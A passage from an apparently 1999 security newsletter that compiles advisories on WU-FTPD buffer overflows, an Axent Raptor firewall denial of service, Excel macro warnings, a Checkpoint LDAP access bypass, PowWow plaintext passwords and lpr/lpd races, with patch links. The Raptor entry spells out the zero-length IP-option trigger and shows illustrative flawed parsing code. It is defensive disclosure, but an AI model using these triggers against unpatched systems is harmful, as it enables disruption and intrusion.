         overwrite static memory in certain configurations of the WU-FTPD
         daemon. The overflow occurs in the MAPPING_CHDIR portion of the source
         code and is caused by creating directories with carefully chosen
         names. As a result, FTP daemons compiled without the MAPPING_CHDIR
         option are not vulnerable.
         
         This is the same vulnerability described in AUSCERT Advisory
         AA-1999.01, which is available from
         
         ftp://www.auscert.org.au/security/advisory/AA-1999.01.wu-ftpd.mapping_
                chdir.vul
                
         This is not the same vulnerability as the one described in CA-99-03
         "FTP Buffer Overflows", even though it is closely related. Systems
         that have patches to correct the issue described in CA-99-03 may still
         be vulnerable to this problem.
      Vulnerability #2: Message File Buffer Overflow
      
         Because of improper bounds checking during the expansion of macro
         variables in the message file, intruders may be able to overwrite the
         stack of the FTP daemon.
         
         This is one of the vulnerabilities described in AUSCERT Advisory
         AA-1999.02, which is available from
         
         ftp://www.auscert.org.au/security/advisory/AA-1999.02.multi.wu-ftpd.vu
                ls
                
      Vulnerability #3: SITE NEWER Consumes Memory
      
         The SITE NEWER command is a feature specific to WUFTPD designed to
         allow mirroring software to identify all files newer than a supplied
         date. This command fails to free memory under some circumstances.
         
      II. Impact
      
      Vulnerability #1: MAPPING_CHDIR Buffer Overflow
      
         Remote and local intruders may be able exploit this vulnerability to
         execute arbitrary code as the user running the ftpd daemon, usually
         root.
         
         To exploit this vulnerability, the intruder must be able to create
         directories on the vulnerable systems that are accessible via FTP.
         While remote intruders are likely to have this privilege only through
         anonymous FTP access, local users may be able to create the required
         directories in their own home directories.
         
      Vulnerability #2: Message File Buffer Overflow
      
         Remote and local intruders may be able exploit this vulnerability to
         execute arbitrary code as the user running the ftpd daemon, usually
         root.
         
         If intruders are able to control the contents of a message file, they
         can successfully exploit this vulnerability. This access is frequently
         available to local users in their home directories, but it may be
         restricted in anonymous FTP access, depending on your configuration.
         
         Additionally, under some circumstances, remote intruders may be able
         to take advantage of message files containing macros provided by the
         FTP administrator.
         Vulnerability #3: SITE NEWER Consumes Memory
      
         Remote and local intruders who can connect to the FTP server can cause
         the server to consume excessive amounts of memory, preventing normal
         system operation. If intruders can create files on the system, they
         may be able exploit this vulnerability to execute arbitrary code as
         the user running the ftpd daemon, usually root.
         
      III. Solution
      
      Install appropriate patches from your vendor
      
         These vulnerabilities can be eliminated by applying appropriate
         patches from your vendor. We encourage you to apply a patch as soon as
         possible and to disable vulnerable programs until you can do so.
         
         Disabling the WU-FTPD daemon may prevent your system from operating
         normally. Upgrading to WU-FTPD 2.6.0 may cause some inter-operability
         problems with certain FTP clients. We encourage you to review the
         WU-FTPD documentation carefully before performing this upgrade.
         
         Appendix A contains information provided by vendors for this advisory.
         We will update the appendix as we receive more information. If you do
         not see your vendor's name, the CERT/CC did not hear from that vendor.
         Please contact your vendor directly.
         
         Until you can install a patch, you can apply the following
         workarounds.
         
      Vulnerability #1: MAPPING_CHDIR Buffer Overflow
      
         This vulnerability can be corrected by compiling the WU-FTPD daemon
         without the MAPPING_CHDIR option. Exploitation by anonymous remote
         intruders can be mitigated by limiting write access, but this solution
         is not encouraged.
         
      Vulnerability #2: Message File Buffer Overflow
      
         Remote exploitation of this vulnerability can be mitigated and
         possibly eliminated by removing macros from message files until a
         patch can be applied.
      Vulnerability #3: SITE NEWER Consumes Memory
      
         There are currently no workarounds available.
         
      Appendix A. Vendor Information
      
      Data General
      
         DG/UX is not vulnerable to this problem.
         
      FreeBSD
      
         FreeBSD has updated its wuftpd and proftpd ports to correct this
         problem as of August 30, 1999. Users of these ports are encouraged to
         upgrade their installation to these newer versions of these ports as
         soon as possible.
         
      IBM Corporation
      
         AIX is not vulnerable. It does not ship wu-ftpd.
         
         IBM and AIX are registered trademarks of International Business
         Machines Corporation.
         
      OpenBSD
      
         OpenBSD does not use (and never will use) wuftpd or any of its
         derivatives.
         
      Santa Cruz Operation, Inc.
      
         Security patches for SCO UnixWare 7.x, SCO UnixWare 2.x, and
         OpenServer 5.x will be made available at http://www.sco.com/security.
         SGI
      
         SGI IRIX and Unicos do not ship with wu-ftpd, so they are not
         vulnerable. As a courtesy, unsupported pre-compiled IRIX inst images
         for wu-ftpd are available from http://freeware.sgi.com/ which may be
         vulnerable. When the freeware products are next updated, they should
         contain the latest wu-ftpd code which should include the security
         fixes.
         
         SGI Linux 1.0 which is based on RedHat 6.0 ships with wu-ftpd rpms.
         When new wu-ftpd rpms are available for RedHat 6.0, they can be
         installed on SGI Linux 1.0.
         
         SGI NT Workstations do not ship with wu-ftpd.
         
      Sun
      
         Sun is not vulnerable.
         
      WU-FTPD and BeroFTPD
      
         Vulnerability #1:
         
         Not vulnerable:
                versions 2.4.2 and all betas and earlier versions
                Vulnerable:
                wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15
                wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17
                wu-ftpd-2.5.0
                BeroFTPD, all versions
                
         Vulnerability #2:
         
         Not vulnerable:
                wu-ftpd-2.6.0
                Vulnerable:
                All versions of wuarchive-ftpd and wu-ftpd prior to version
                2.6.0, from wustl.edu, academ.com, vr.net and wu-ftpd.org.
                BeroFTPD, all versions
                
         Vulnerability #3:
          
         Not vulnerable:
                wu-ftpd-2.6.0
                Vulnerable:
                All versions of wuarchive-ftpd and wu-ftpd prior to version
                2.6.0, from wustl.edu, academ.com, vr.net and wu-ftpd.org.
                BeroFTPD, all versions
                
         With version 2.6.0, the major functionality of BeroFTPD has been
         merged back into the WU-FTPD daemon. Development of BeroFTPD has
         ceased; there will be no upgrades or patches. Users are advised to
         upgrade to WU-FTPD version 2.6.0.
         
         WU-FTPD Version 2.6.0 is available for download from mirrors arround
         the world. A full list of mirrors is available from:
         
         ftp://ftp.wu-ftpd.org/pub/README-MIRRORS
                
         The current version of WU-FTPD (presently 2.6.0) is also available
         from the primary distribution site:
         
         ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-current.tar.gz
                ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-current.tar.Z
           _________________________________________________________________
         
         The CERT Coordination Center would like to thank Gregory Lundberg (a
         member of the WU-FTPD development group) and AUSCERT their assistance
         in preparing this advisory.
         ______________________________________________________________________
         
         This document is available from:
         http://www.cert.org/advisories/CA-99-13-wuftpd.html
      
               
       @HWA
       
65.0  Axent Raptor Denial of Service Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.securityfocus.com/ 
      
      bugtraq id 736
      class      Failure to Handle Exceptional Conditions
      cve        GENERIC-MAP-NOMATCH
      remote     Yes
      local      No
      published  October 21, 1999
      updated    October 21, 1999
      
      vulnerable
      
              Axent Raptor 6.0         
              
       It is possible to remotely lock Axent Raptor firewalls by sending them
      packets with malformed IP options fields. According to an advisory
      posted to bugtraq by the perdue CERIAS labs, setting the SECURITY
      and TIMESTAMP IP options length to 0 can cause an infinite loop to
      occur within the code that handles the options (resulting in the software
      freezing). A consequence of this is a remote denial of service.        
      
      Axent has released a hotfix for this problem which is available at:

      ftp://ftp.raptor.com/patches/V6.0/6.02Patch/
      
      credit
      This was discovered by the CERIAS labs at perdue
      (cs.perdue.edu) and posted to BugTraq on October 21,
      1999.

      reference
       message:
               Remote DoS in Axent's Raptor 6.0
               (Mike Frantzen <frantzen@expert.cc.purdue.edu>)
               
       To: BugTraq
       Subject: Remote DoS in Axent's Raptor 6.0
       Date: Wed Oct 20 1999 04:45:56
       Author: Mike Frantzen
       Message-ID: <199910202245.RAA28104@expert.cc.purdue.edu>
      
      
       This bug was discovered in the CERIAS lab's at Purdue by:
              Florian Kerschbaum  <fkerschbaum@cs.purdue.edu>
              Mike Frantzen       <frantzen@expert.cc.purdue.edu>
                      
       Thanks to the Purdue CERIAS Firewall group:
              Stephanie Miller    <millersa@cs.purdue.edu>
              Florian Kerschbaum  <fkerschbaum@cs.purdue.edu>
              Mike Frantzen       <frantzen@expert.cc.purdue.edu>
              Eric Hlutke         <eric@hlutke.com>
              Hendry Lim          <lim1@cs.purdue.edu)
              Manu Pathak         <pathakm@cs.purdue.edu>
      
      
       Environment:  Sparc 5 85MHz
                     Solaris 2.6 Generic_105181-12
                     Axent Raptor 6.0.0 Firewall
      
      
       Thesis:  Axent's Raptor programmers have a switch statement for
                IP Options in a packet.  They likely have cases for most
                of the options contained in the RFC's but only wrote
                handling code for the commonly 'malused' options (source
                routing).  For all the other known options, they are handled
                by a generic routine which likely tries to skip that option.
                See probable code snapshot below.
      
      
       Background:  IP Options are (generally) of the form:
                 -------- -------- -------- --------
                |  Type  | Length |  ...   |  ...   |
                 -------- -------- -------- --------
                Where the Type indicates which IP Option is present and the
                Length obviously indicates how long the option is.  It also
                needs to be pointed out that there can be multiple options
                inside an IP packet -- they just follow each other.
      
      
       Problem: IP Packets are parsed either with interrupts masked off or
                while holding an vital global mutex.  When the option
                parsing tries to skip a 'benign' option, it forgets to check
                if it is of zero length.  So the end result is essentially:
                  for (ecx = 20; ecx < header_length; ecx += 0 ) { ... }
                The Options that can lock up the firewall are the Timestamp option
                and the Security option.  The copy bit does not appear to affect
                the results.  Nor does the underlying protocol (TCP, UDP or
                random).
      
      
       Solution one:  Learn to power cycle your firewall ;-)
       Solution two:  Block all traffic with IP Options at your screening router.
       Solution three:  Apply Axent's Hotfix
                        ftp://ftp.raptor.com/patches/V6.0/6.02Patch/
      
      
       Sidenote one:  Axent received the bug and responded _swiftly_.  I was
                      extremely impressed.
       Sidenote two:  Out of respect to the way Axent handled the bug (and the fact
                      they are a CERIAS Sponsor), we are not releasing an exploit.
      
      
       This is the probable offending segment of code in Raptor.  It is only
       an educated guess--I have not seen their code nor have I disassembled it.
      
       [.....]
      
              /* Parse the IP Options of the packet */
              for (c = 20; c < (ip.ip_hl * 4); ) {
                      switch ( packet[c] & ~COPY_BIT ) {
                       case TIMESTAMP:
                       case SECURITY:
                              if ( c + 1 > ip.ip_hl * 4 )
                                      goto done_parsing_label;
                              option_length = packet[c + 1];
      
                               /* ******************************   ****
                                * Forgetting to check if the option length is
                                * zero here.  So you enter an infinite loop
                                * ******************************   ****/
      
                              if ( option_length + c > ip.ip_hl * 4 )
                                      goto done_parsing_label;
                              c += option_length;
                              break;
                       case END_OF_OPTIONS:
                              goto done_parsing_label;
                       case NOP:
                              c++;
                              break;
                       case STRICT_SOURCE_ROUTE:
                       case LOOSE_SOURCE_ROUTE:
                       case RECORD_ROUTE:
                              log_dangerous_packet();
                       default:
                              if ( c + 1 >= ip.ip_hl * 4 )
                                      goto done_parsing_label;
                              option_length = packet[c + 1];
                              if ( (option_length == 0)
                                 ||(option_length + c >= ip.ip_hl * 4) )
                                      goto done_parsing_label;
                              c += option_length;
                              break;
                      }
              }
              done_parsing_label:
      
              queue_packet_down_stack(packet);
              unmask_interrupts();

       [.....]
       
       
       @HWA


66.0  RedHat screen pty(7) Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  732
      object      screen (exec)
      class       Origin Validation Error
      cve         GENERIC-MAP-NOMATCH
      remote      No
      local       Yes
      published   October 21, 1999
      updated     October 21, 1999
      
      vulnerable
      
              RedHat Linux 6.1
              
      not vulnerable
              RedHat Linux 6.0.0
              RedHat Linux 5.2.0
              RedHat Linux 5.1.0
              RedHat Linux 5.0.0
              RedHat Linux 4.2.0
              RedHat Linux 4.1.0
              RedHat Linux 4.0.0
              RedHat Linux 3.0.3
              RedHat Linux 2.1.0
              RedHat Linux 2.0.0
              
       The version of screen which ships with Redhat Linux 6.1 sets incorrect
       permissions on the pty (pseudo-terminal driver). The pty driver provides
       support for a pair of devices collectively known as a pseudo-terminal.
       The two devices comprising a pseudo-terminal are known as a
       controller and a slave. 

       Instead of having a hardware interface and associated hardware that
       supports the terminal functions, the functions are implemented by
       another process manipulating the controller device of the
       pseudo-terminal.

       These pty's are represented as a regular file on the UNIX filesystem. As
       a result of poor permission settings, these pty's are world writable thus
       allowing other users to hijack other users pty's and execute commands
       as the user whose pty has been stolen. This can result in root privileges
       if 'root' is running the vulnerable version of screen.       
       
       Redhat has made the following RPMS available which address this
       problem:

       Red Hat Linux 6.1:

       Intel: 

       ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/screen-3.9.4-3.i386.rpm

       Source package: 

       ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/screen-3.9.4-3.src.rpm
       
       credit
      This bug was discovered by Chris Evans and posted as a
      Redhat advisory (RHSA-1999:042-01) to the Bugtraq
      mailing list by Bill Nottingham <notting@REDHAT.COM> on
      Wed, 20 Oct 1999.

      reference
        advisory:
               RHSA-1999:042-01: screen defaults to not
               using Unix98 ptys
               (RedHat)
               http://www.securityfocus.com/templates/advisory.html?id=1800
               
        web page:
               Updates, Fixes, and Errata Page
               (RedHat)
               http://www.redhat.com/corp/support/errata/index.html
               
               
        
       @HWA
       
67.0  Microsoft Excel File Import Macro Execution Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  728
      class       Design Error
      cve         GENERIC-MAP-NOMATCH
      remote      Unknown
      local       Yes
      published   October 20, 1999
      updated     October 20, 1999
 
 
      vulnerable
      
              Microsoft Excel 97 SR2
              Microsoft Excel 97 SR1
              Microsoft Excel 97
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0
              Microsoft Office 97
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0       
                 
       When a Lotus 1-2-3 or Quattro Pro file containing a macro is opened by
      Excel 97, the user is not warned that a macro will be executed upon
      opening the file (as is customary when Excel opens other spreedsheet
      files containing macros.)           
      
      Microsoft has released a patch for this vulnerability. It is available at:

      - Excel 97:
      http://officeupdate.microsoft.com/downloadDetails/Xl8p7pkg.htm
      - Excel 2000:
      http://officeupdate.microsoft.com/2000/downloadDetails/XL9p1pkg.htm
      
      credit
      The vulnerability was reported to Microsoft by David Young
      of Derby, UK.

      reference
       advisory:
               MS99-044: Patch Available for "Excel SYLK"
               Vulnerability
               (MS)
               http://www.securityfocus.com/templates/advisory.html?id=1798
               
       web page:
               Microsoft Security Bulletin MS99-044:
               Frequently Asked Questions
               (Microsoft)
               http://www.microsoft.com/security/bulletins/MS99-044faq.asp
               
       web page:
               Q241900: XL97: Opening Lotus 1-2-3 File May
               Execute Macro Without Warning
               (Microsoft)
               http://support.microsoft.com/support/kb/articles/q241/9/00.asp
               
               
               
      @HWA
      
68.0  Checkpoint Firewall-1 LDAP Authentication Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id   725
      class        Access Validation Error
      cve          GENERIC-MAP-NOMATCH
      remote       Yes
      local        No
      published    October 20, 1999
      updated      October 20, 1999
      
      vulnerable
      
              Checkpoint Software Firewall-1 4.0
              
      not vulnerable
      
              Checkpoint Software Firewall-1 3.0.0
              
      With FireWall-1 Version 4.0 Checkpoint introduced support for the
      Lightweight Directory Access Protocol (LDAP) for user authentication. It
      looks like there's a bug in Checkpoint's ldap code which under certain
      circumstances can lead to unauthorized access to protected systems
      behind the firewall.
     
      A user can authenticate himself at the firewall providing a valid
      username and password. The firewall acts as a ldap client, validating
      the credentials by a directory server using the ldap protocol. After
      successful authentication access will be granted to systems protected
      by the firewall.
     
      In contrast to authentication using the Radius or SecurID protocol, after
      successful authentication the directory server can supply the firewall
      with additional ldap attributes for the user like the time and day of a
      week a user is allowed to login, the source addresses a user can run a
      client from, or the system behind the firewall a user is allowed to access.
      This can be done individual for each user.
     
      In general I think that's a great idea but it seems Checkpoint made
      something wrong interpreting the ldap attribute 'fw1allowed-dst' which is
      supposed to control in detail which protected network object a user can
      access.
      It seems this attribute is ignored by the firewall software, granting
      access to all protected network objects instead.
     
     
     
      Example:
     
      ------ Server 'Foo'
      |
      Internet --- FW-1 ---|
      |
      ------ Server 'Bar'
     
      Supposed there's a user 'Sid' with access only to Server 'Foo', and a
      second user 'Nancy' with access restricted to Server 'Bar', both
      controlled by the ldap protocol, using the ldap attribute 'fw1allowed-dst'.
      The bug will cause that both, Sid and Nancy, will have access to Foo
      and to Bar.
     
      [Quoted from the post by Olaf Selke with permission]        
      
      credit
      This vulnerability was posted to the Bugtraq mailing list by
      Olaf Selke <olaf.selke@mediaways.net> on Wed, 20 Oct
      1999.

      reference
       web page:
               Firewall-1 Connection Table Paper
               (Lance Spitzner)
               http://www.enteract.com/~lspitz/fwtable.html
               
       web page:
               Checkpoint Tecnical Support
               (Checkpoint Software)
               http://www.checkpoint.com/techsupport/
               
       message:
               Checkpoint FireWall-1 V4.0: possible bug in
               LDAP authentication
               (Olaf Selke <Olaf.Selke@mediaWays.net>)
               http://www.securityfocus.com/templates/archive.pike?list=1&msg=19991020150002.21047.qmail@tarjan.mediaways.net
               
       
       To: BugTraq     
       Subject: Checkpoint FireWall-1 V4.0: possible bug in LDAP authentication
       Date: Wed Oct 20 1999 09:00:02
       Author: Olaf Selke
       Message-ID: <19991020150002.21047.qmail@tarjan.mediaways.net>
      
      
      Overwiew:
      
      With FireWall-1 Version 4.0 Checkpoint introduced support for the
      Lightweight Directory Access Protocol (LDAP) for user authentication.
      It looks like there's a bug in Checkpoint's ldap code which under
      certain circumstances can lead to unauthorized access to protected
      systems behind the firewall.
      
      
      Technical background:
      
      A user can authenticate himself at the firewall providing a valid
      username and password. The firewall acts as a ldap client, validating
      the credentials by a directory server using the ldap protocol. After
      successful authentication access will be granted to systems protected
      by the firewall.
      
      In contrast to authentication using the Radius or SecurID protocol,
      after successful authentication the directory server can supply the
      firewall with additional ldap attributes for the user like the time
      and day of a week a user is allowed to login, the source addresses
      a user can run a client from, or the system behind the firewall a user
      is allowed to access. This can be done individual for each user.
      
      In general I think that's a great idea but it seems Checkpoint made
      something wrong interpreting the ldap attribute 'fw1allowed-dst' which
      is supposed to control in detail which protected network object a user
      can access.
      
      It seems this attribute is ignored by the firewall software, granting
      access to all protected network objects instead.
      
      
      Example:
      
                           ------ Server 'Foo'
                           |
      Internet --- FW-1 ---|
                           |
                           ------ Server 'Bar'
      
      
      Supposed there's a user 'Sid' with access only to Server 'Foo', and
      a second user 'Nancy' with access restricted to Server 'Bar', both
      controlled by the ldap protocol, using the ldap attribute
      'fw1allowed-dst'. The bug will cause that both, Sid and Nancy, will
      have access to Foo and to Bar.
      
      
      Conclusion:
      
      I don't consider it as major bug, but it's serious enough that one can't
      rely on access control enforced through ldap. I've reported this problem
      through Checkpoint's support channels two weeks ago, but so far there's
      no response at all.
      
      Attached is the original bug report I've sent to technical support.
      
      Olaf
      --
      Olaf Selke, olaf.selke@mediaways.net, voice +49 5241 80-7069
      
      
      =============================== snip ===============================
      
      firewall: Solaris 2.6, V4.0 SP4 [VPN + DES + STRONG]
      management machine: Solaris 2.6, V4.0 SP4 [VPN + DES + STRONG]
      Directory Server: Solaris 7, Netscape-Directory/4.0 B98.349.0339
      
      
      Today we found that FW-1 seems to ignore the ldap attribute
      'fw1allowed-dst' completely, granting access to 'any' instead.
      If that's really the case, it could lead to a breach of security.
      
      We successfully coupled a FW-1 V4.0 SP4 with a Netscape Directory
      Server according CP's documentation. Surprisingly this went very
      smoothly ;-) In a second step we checked if the FW software really
      cares about the ldap attributes controlling access in detail, using a
      client authentication rule for this purpose.
      
      It looks like the attributes 'fw1hour-range-from', 'fw1hour-range-to',
      and 'fw1allowed-src' are interpreted as expected by the firewall, so
      I think we didn't made some mistake in general.
      
      However, from our point of view, in any case the ldap attribute
      'fw1allowed-dst' is ignored and silently substituted by 'any'.
      This means a user with restricted access through ldap attributes
      has full access after successful authentication.
      
      @HWA
      
69.0  Microsoft Excel SYLK Macro Execution Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      bugtraq id  727
      class       Design Error
      cve         GENERIC-MAP-NOMATCH
      remote      No
      local       Yes
      published   October 20, 1999
      updated     October 20, 1999
      
      vulnerable
      
              Microsoft Excel 97 SR2
              Microsoft Excel 97 SR1
              Microsoft Excel 97
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0
              Microsoft Excel 2000
              Microsoft Office 97
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0
              Microsoft Office 2000
              
      When a symbolic link (SYLK) file containing a macro is opened by Excel
      97 or Excel 2000, the user is not warned that a macro will be executed
      upon opening the file (as is customary when Excel opens other
      spreedsheet files containing macros.) SYLK files are basic ascii files
      that can be read by a variety of applications, including word processors
      and other spreadsheet applications. SYLK files can be created using
      the "Save As" function in Microsoft Excel.        
      
      Microsoft has released a patch for this vulnerability. It is available at:

      - Excel 97:
      http://officeupdate.microsoft.com/downloadDetails/Xl8p7pkg.htm
      - Excel 2000:
      http://officeupdate.microsoft.com/2000/downloadDetails/XL9p1pkg.htm
      
      credit
      The vulnerability was reported to Microsoft by David Young
      of Derby, UK.

      reference
       advisory:
               MS99-044: Patch Available for "Excel SYLK"
               Vulnerability
               (MS)
               http://www.securityfocus.com/templates/advisory.html?id=1798
               
       web page:
               Microsoft Security Bulletin MS99-044:
               Frequently Asked Questions
               (Microsoft)
               http://www.microsoft.com/security/bulletins/MS99-044faq.asp
               
       web page:
               Q241901: XL2000: Macro Virus Warning Does
               Not Appear Opening SYLK File
               (Microsoft)
               http://support.microsoft.com/support/kb/articles/q241/9/01.asp
       
       web page:
               Q241902: XL97: Macro Virus Warning Does
               Not Appear Opening SYLK File
               (Microsoft)
               http://support.microsoft.com/support/kb/articles/q241/9/02.asp
               
               
      @HWA
      
70.0  Wu-ftpd message Buffer Overflow Vulnerability
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                
      
      bugtraq id  726
      class       Boundary Condition Error
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       No
      published   October 19, 1999
      updated     October 20, 1999
      
      
      vulnerable
      
                 Washington University wu-ftpd 2.5
                 + RedHat Linux 6.1
      
      not vulnerable
       
                Washington University wu-ftpd 2.6.0
                
       There is a buffer overflow in wu-ftpd message file expansions which may
       be remotely exploitable. In situations where the message file can be
       written to in some way remotely by regular or anonymous users, this
       may result in a root compromise. This detailed in an AUSCERT advisory
       AA-1999.01.         
       
       Upgrade to the newest version of wu-ftpd not vulnerable to this problem
       (2.6.0 as of Oct 20, 1999), available at the location below:

       ftp://ftp.wu-ftpd.org/pub/wu-ftpd/
       
       credit
      Exposed in AusCERT advisory AA-1999.02, published on
      October 19, 1999.

      reference
       advisory:
              CA-99-13: Multiple Vulnerabilities in WU-FTPD
              (CERT)
              http://www.securityfocus.com/templates/advisory.html?id=1797
              
       advisory:
              AA-99.02: Multiple Vulnerabilities in wu-ftpd
              based daemons
              (AusCERT)
              http://www.securityfocus.com/templates/advisory.html?id=1799
              
       advisory:
              RHSA-1999:043-01: Security problems in
              WU-FTPD
              (RedHat)
              http://www.securityfocus.com/templates/advisory.html?id=1801
              
               
       @HWA
       
71.0  Tribal Voice PowWow Password Vulnerabilities
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  724
      class       Unknown
      cve         GENERIC-MAP-NOMATCH
      remote      Yes
      local       Yes
      published   October 19, 1999
      updated     October 19, 1999
      
      vulnerable
      
              Tribal Voice PowWow 3.73
                 - Microsoft Windows 98
                 - Microsoft Windows 95
                 - Microsoft Windows NT 4.0      
       
       PowWow is a network communications tool by Tribal Voice, similar to
      ICQ or AOL Instant Messenger. PowWow contains several vulnerabilities
      whereby a user's PowWow password can be obtained by an attacker. 
     
      The first vulnerability involves the powwow.ini file, where a user's name
      and password are stored in plaintext. This file can be found at
      C:\windows\powwow.ini on Win9x platforms and at C:\winnt\powwow.ini
      on NT machines. The entries look like this:
     
      LOCALNAME:user @ server.com
      LOCALPASS:user's_password
     
      The second vulnerability is related to how PowWow transmits the
      password to the PowWow server to authenticate the user in various
      operations, mostly related to listings in the PowWow white pages. The
      password is sent via the URL, in plaintext, meaning it is accessible
      visibly from the address bar or (later) the history list of the browser
      being used, as well as via sniffing at any intermediary point on the
      network. For example, the URL used to remove oneself from the White
      pages listing is:
     
      http ://ww2.tribal.com/white_pages/RemoveWpfromPow.cfm?PowID=user
      @ server.com&Pswd=user's_password
     
      The third vulnerability is in Tribal Voice's free email service for PowWow
      users. During the sign-up process, the user's password is displayed
      back to them in a web page, which once again can be viewed by anyone
      in the vicinity or retrieved via sniffing or the browser's local cache.
     
      Also, this free email service allows the option of having it log into a POP
      server elsewhere as the user, retrieving your mail, and presenting it to
      you in your PowWow inbox. To do this, you enter the info for your POP
      account into a web form at Tribal Voice, and they store it at the server
      for later use. This means that the user's password is stored remotely
      (encryption/security practices unknown), which leads to two problems:
      1) If the Tribal Voice server is compromised, all users using this option
      could have their POP accounts elsewhere compromised as well. 2)
      Attackers could use this service to remotely access POP accounts they
      have hacked/obtained, with an added level of anonymity          
      
      Tribal Voice has claimed that the powwow.ini issue will be fixed in a
      future release of the product. Password storage can be disabled via the
      preferences button in the program (default is On).
      
      credit
      
      Original information submitted to Security Focus by Jim
      Williams <netsecurity.guide@about.com>. Additional
      research by Ben Greenbaum of Security Focus.

      reference
       
       web page:Tribal Voice Homepage
               (Tribal Voice)
               http://www.tribal.com/
               
               
      @HWA         
                                   
72.0  RedHat lpr/lpd Vulnerabilities           
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      bugtraq id  718
      object      lpr and lpd (exec)
      class       Race Condition Error
      cve         GENERIC-MAP-NOMATCH
      remote      No
      local       Yes
      published   October 18, 1999
      updated     October 18, 1999
      
      vulnerable
      
              RedHat Linux 6.1
              RedHat Linux 6.0
              RedHat Linux 5.2
              RedHat Linux 5.1
              RedHat Linux 5.0
              RedHat Linux 4.2
              RedHat Linux 4.1
              RedHat Linux 4.0
              
      The lpr packages that ship with RedHat Linux releases 4.x to 6.1 contain
      vulnerabilities which may allow printing of files for which read access is
      not allowed. The first of the two problems is a race condition that can be
      exploited between the access checking and the opening of the file. The
      second is a symlink attack that could also be used to print files that
      normally cannot be read by a regular user (through lpr -s).        
      
      Patched versions of the lpr packages are available at the links listed
      below:
     
      Red Hat Linux 4.x:
     
      Intel:
      ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
     
      Alpha:
      ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
     
      Sparc:
      ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
     
      Source packages:
      ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm
     
      Red Hat Linux 5.x:
     
      Intel:
      ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
     
      Alpha:
      ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
     
      Sparc:
      ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
     
      Source packages:
      ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm
     
      Red Hat Linux 6.x:
     
      Intel:
      ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
     
      Alpha:
      ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
     
      Sparc:
      ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
     
      Source packages:
      ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm
     
      The MD5 sums for each of these packages is available in the advisory
      linked to from the references section.
      
      credit
      Released in RedHat advisory RHSA-1999:041-01 on
      October 17, 1999.

      reference
       
       advisory:
               RHSA-1999:041-01: File access problems in
               lpr/lpd
               (RedHat)
               http://www.securityfocus.com/templates/advisory.html?id=1792
       
       web page:
               Updates, Fixes, and Errata Page
               (RedHat)
               http://www.redhat.com/corp/support/errata/index.html
               
      RHSA-1999:041-01: File access problems in lpr/lpd
      Published: Sun Oct 17 1999
      Updated: Mon Oct 18 1999 
      
      
      
      ---------------------------------------------------------------------
                         Red Hat, Inc. Security Advisory
      
      Synopsis:               File access problems in lpr/lpd
      Advisory ID:            RHSA-1999:041-01
      Issue date:             1999-10-17
      Updated on:
      Keywords:               lpr lpd permissions
      Cross references:
      ---------------------------------------------------------------------
      
      1. Topic:
      
      There are potential problems with file access checking in
      the lpr and lpd programs. These could allow users to
      potentially print files they do not have access to. Also,
      there are bugs in remote printing in the lpd that shipped
      with Red Hat Linux 6.1.
      
      2. Bug IDs fixed (http://developer.redhat.com/bugzilla for more info):
      
      5122 5540 5697 5832 5835 5903 5949
      
      3. Relevant releases/architectures:
      
      Red Hat Linux 4.x, all architectures
      Red Hat Linux 5.x, all architectures
      Red Hat Linux 6.x, all architectures
      
      4. Obsoleted by:
      
      5. Conflicts with:
      
      6. RPMs required:
      
      Red Hat Linux 4.x:
      
      Intel:
        ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
      
      Alpha:
        ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
      
      Sparc:
        ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
      
      Source packages:
